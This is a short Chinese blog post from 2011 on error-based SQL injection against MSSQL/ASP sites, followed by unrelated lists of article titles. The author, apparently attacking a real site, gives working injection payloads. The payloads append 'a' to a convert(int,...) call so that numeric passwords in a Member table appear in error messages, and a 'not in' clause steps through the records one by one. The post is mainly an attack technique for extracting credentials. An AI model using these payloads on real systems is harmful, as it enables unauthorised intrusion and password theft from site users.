Title:MSSQL显错注入爆数字型数据的一点思考 --2011-02-22 15:23

MSSQL+ASP

最近在弄个站点,密码是纯数字的,convert(int,())转换出来不报错,也不知道其他人用的什么函数或者类型来爆密码像"11111111"的这样的数据的,就自己想了下弄了个暂时可以用的方法.

数据库查询如图:

图一:

图二:

图三:

图四:

图五:


下面是实验

表Member 字段Password

语句

' or 1=convert(int,(select top 1 password from Member))--

语句'  or 1=convert(int,(select top 1 password from member)+'a')--


然后查询下一条数据

语句'  or 1=convert(int,(select top 1 password from member where password not in ('117517450'))+'a')--

不知道其他人是怎么爆的,可以告诉我的话,留个言,谢谢。

最新文章

  1. window7系统怎么找到开始运行命令
  2. C语言: 运算符,printf,scanf的用法
  3. SSH框架整合项目(一)——搭建平台和引入依赖
  4. Torch 7 load saved model failed, 加载保存的模型失败
  5. 1.9 基础知识——GP2.10 高级别的领导检查(Higher level management)
  6. 无法分配超出32(XXX)的MINEXTENTS报错的解决方法
  7. php-数据库访问--增、删、改
  8. QQ摄像头读取条码
  9. 【转载】SAP的标准对话框函数
  10. maven私服搭建和启动遇到的问题
  11. 人体时钟hone hone clock
  12. wpf 大控件 打印 将控件转成 xps格式 并分页打印
  13. MySql单表最大8000W+ 之数据库遇瓶颈记
  14. OpenTK教程-2绘制一个三角形(正确的方法)
  15. chrome开发工具指南(六)
  16. iOS下使状态栏颜色与H5中背景色一致
  17. Linux内核模块编程——Hello World模块
  18. 弹出的 Dialog 里,包含 Form,如何在关闭 Dialog 时,执行 resetFields(对整个表单进行重置,将所有字段值重置为初始值并移除校验结果)
  19. Linux知识(6)----卸载安装的包
  20. China Cloud Computing Conference(2018.07.24)

热门文章

  1. MapReduce的reduce函数里的key用的是同一个引用
  2. 基于deb包快速搭建内外apt源
  3. apt-mirror
  4. F - Power Network - poj 1459(简单最大流)
  5. spring3.1的BeanFactory与Quartz1.8整合
  6. Oracle 数据库 Database Express Edition 11g Release 2 (11.2) 错误解决集锦(安装方面)
  7. 【服务器运维】Windows Server 2008 R2 下配置证书服务器和HTTPS
  8. 常用PC服务器LSI阵列卡配置
  9. 反编译 APKTool 逆向助手
  10. codevs 3693 数三角形